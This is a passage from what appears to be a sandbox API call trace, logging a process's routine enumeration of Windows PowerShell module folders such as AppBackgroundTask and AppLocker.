dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0224.481] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0224.481] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0224.481] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0224.481] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dc10 | out: lpFindFileData=0x653ef8dc10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 0 [0224.482] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de70) returned 1 [0224.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0224.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.482] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0224.482] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.484] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.484] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0224.484] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0224.484] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0224.484] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0224.485] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0224.485] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.486] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0224.486] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.487] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.487] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0224.487] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0224.487] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0224.487] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0224.487] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.487] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.489] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d9f00 [0224.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x25b739d9f00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0224.489] CoTaskMemFree (pv=0x25b739d9f00) [0224.500] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8d970, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0224.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.500] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dea0 | out: lpFileInformation=0x653ef8dea0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.501] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x653ef8d8f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0224.501] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x653ef8db20 | out: lpFindFileData=0x653ef8db20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.502] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.502] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0224.502] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0224.502] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0224.502] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0224.503] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0224.503] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.505] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0224.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.506] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0224.506] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.507] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.507] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0224.507] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0224.507] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.513] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0224.513] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.513] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.514] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0224.514] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.514] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.514] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x653ef8d970, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0224.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.514] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dea0 | out: lpFileInformation=0x653ef8dea0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.514] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0x653ef8d8f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0224.514] FindFirstFileW (in: 